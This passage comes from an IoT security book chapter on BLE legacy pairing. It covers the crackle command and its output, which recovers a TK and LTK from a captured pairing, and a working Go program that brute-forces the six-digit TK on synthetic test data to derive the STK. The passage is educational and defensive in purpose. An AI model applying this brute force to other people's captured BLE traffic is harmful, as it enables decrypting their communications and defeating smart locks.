Abusing the Internet of Things


exchange protocol begins by selecting a temporary key (TK); every key that follows is derived
from it with the Advanced Encryption Standard (AES) block cipher.
According to the BLE specification, the value of the TK is 0 if the Just Works mode is
selected. This mode is used by devices that have no display or keypad, so the pairing completes
without any user interaction. Otherwise a six-digit value between 0 and 999999 is used. This is
the more common method: one device displays the passkey and the user enters it on the other.
Once the TK is set, the master and the slave use it to compute a short-term key (STK), and the
STK in turn protects the exchange that establishes the LTK.
Ryan has released a tool called crackle, which takes a captured BLE pairing and brute-forces
the TK by trying every value from 0 through 999999: each candidate is run through the pairing
confirm function and compared with the confirm values (Mconfirm and Sconfirm) that the devices
sent in the clear. Once the TK is found, the STK follows directly, because it is computed from
the TK and the two random values (Mrand and Srand) that also travelled in the clear. Finally,
the LTK is recovered by decrypting the key-distribution packets, which are encrypted under the
STK. Assuming the captured data is stored in a file called capture.pcap, the following
command runs the crackle tool:


[bash]$ crackle -i capture.pcap -o decrypted.pcap
TK found: 249592
LTK found: 26db138d0aa63a12dd596228577c4731
Done, processed 106 total packets, decrypted 19

A tool such as Wireshark can now open the decrypted.pcap file, which contains the traffic in
clear text. Note that Ryan's brute-force method does not work against Out-of-Band (OOB)
mode, in which a full 128-bit TK is exchanged over a channel other than BLE (typically NFC):
searching a 128-bit key space is computationally infeasible. But most devices use either
Just Works or the six-digit passkey, so the majority of BLE devices are vulnerable.
Anyone investigating a BLE IoT device should be familiar with Ryan's research and the
Ubertooth set of tools, because they are indispensable for capturing and analyzing BLE
traffic and for testing whether the pairing of the products in question is securely designed.
Furthermore, as of this writing, the current Bluetooth specification (4.1) does not address
Ryan's brute-force attack, so devices that rely upon legacy BLE pairing for their encryption
remain vulnerable. (The LE Secure Connections pairing introduced in Bluetooth 4.2 replaces
the passkey-derived TK with an elliptic-curve Diffie-Hellman exchange and is not affected,
but only devices that actually negotiate that mode benefit from it.)
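To make the TK, STK and LTK chain concrete, here is an added example in Go (not crackle's source and not from the book) that re-implements the TK brute force on top of the legacy-pairing functions c1 and s1 from the Bluetooth Core specification (Vol 3, Part H, section 2.2). The pairing it attacks is constructed: MakeCapture builds a synthetic exchange from the specification's sample preq/pres/address values and a chosen passkey, and CrackCapture recovers that passkey and derives the STK exactly as the master does. The last step, decrypting the key-distribution packets that carry the LTK under the STK-derived session key, is not reproduced here.

```go
package main

import (
	"crypto/aes"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// Added example, not crackle's code. All 128-bit values use the spec's
// most-significant-byte-first convention; bytes sniffed off the air are
// little-endian and must be reversed before being fed in.

// Capture holds the fields an attacker can read from a sniffed legacy pairing
// (all of them travel in the clear).
type Capture struct {
	Preq, Pres []byte // 7-byte Pairing Request / Pairing Response commands
	Iat, Rat   byte   // initiator (master) / responder (slave) address types
	Ia, Ra     []byte // 6-byte initiator / responder Bluetooth addresses
	Mrand      []byte // 128-bit master random
	Mconfirm   []byte // 128-bit master confirm = c1(TK, Mrand, ...)
	Srand      []byte // 128-bit slave random
}

// e is the spec's security function e: one AES-128 block encryption.
func e(key, plaintext []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	out := make([]byte, 16)
	block.Encrypt(out, plaintext)
	return out
}

func xor16(a, b []byte) []byte {
	out := make([]byte, 16)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// c1 is the confirm value function:
//   p1 = pres || preq || rat || iat      p2 = padding || ia || ra
//   c1 = e(k, e(k, r XOR p1) XOR p2)
func c1(k, r, preq, pres []byte, iat byte, ia []byte, rat byte, ra []byte) []byte {
	p1 := append(append(append([]byte{}, pres...), preq...), rat, iat)
	p2 := append(append([]byte{0, 0, 0, 0}, ia...), ra...)
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// s1 derives the STK: r' = LSB64(r1) || LSB64(r2); s1 = e(k, r').
func s1(k, r1, r2 []byte) []byte {
	return e(k, append(append([]byte{}, r1[8:]...), r2[8:]...))
}

// tkFromPasskey builds the 128-bit TK: the six-digit passkey (0 for
// Just Works) sits in the least significant bits, everything else is zero.
func tkFromPasskey(passkey uint32) []byte {
	tk := make([]byte, 16)
	binary.BigEndian.PutUint32(tk[12:], passkey)
	return tk
}

// CrackCapture tries every TK from 0 to 999999 until the recomputed Mconfirm
// matches the sniffed one, then derives the STK as the master does
// (STK = s1(TK, Srand, Mrand)). An OOB pairing, whose 128-bit TK is outside
// this search space, exhausts the loop and returns ok == false.
func CrackCapture(c Capture) (passkey uint32, stk []byte, ok bool) {
	for pk := uint32(0); pk <= 999999; pk++ {
		tk := tkFromPasskey(pk)
		if string(c1(tk, c.Mrand, c.Preq, c.Pres, c.Iat, c.Ia, c.Rat, c.Ra)) == string(c.Mconfirm) {
			return pk, s1(tk, c.Srand, c.Mrand), true
		}
	}
	return 0, nil, false
}

func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

// MakeCapture constructs a synthetic pairing for the given passkey (constructed
// test data, not a real sniff). preq, pres, the addresses and Mrand are the
// sample inputs of the specification's c1 test vector.
func MakeCapture(passkey uint32) Capture {
	c := Capture{
		Preq: mustHex("07071000000101"), Pres: mustHex("05000800000302"),
		Iat: 1, Rat: 0,
		Ia: mustHex("a1a2a3a4a5a6"), Ra: mustHex("b1b2b3b4b5b6"),
		Mrand: mustHex("5783d52156ad6f0e6388274ec6702ee0"),
		Srand: mustHex("000f0e0d0c0b0a091122334455667788"),
	}
	c.Mconfirm = c1(tkFromPasskey(passkey), c.Mrand, c.Preq, c.Pres, c.Iat, c.Ia, c.Rat, c.Ra)
	return c
}

func main() {
	c := MakeCapture(249592) // the TK crackle reported in the text above
	pk, stk, ok := CrackCapture(c)
	fmt.Printf("found=%v TK=%d STK=%s\n", ok, pk, hex.EncodeToString(stk))
}
```

Just Works pairings fall to the very first candidate (TK = 0), a six-digit passkey costs at most a million AES evaluations, and an OOB pairing is the one case where the loop runs to completion without a hit; that is the whole gap between the three modes.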


Kevo Mobile App Insecurities


The Kwikset Kevo lock shown in Figure 2-3 can be operated via the companion Kevo iOS app
on an iPhone.
Upon first launch, the user is asked to specify an email address and password. As shown
in Figure 2-7, passwords must be at least eight characters long and include at least one
number.


CHAPTER 2: ELECTRONIC LOCK PICKING—ABUSING DOOR LOCKS TO COMPROMISE PHYSICAL SECURITY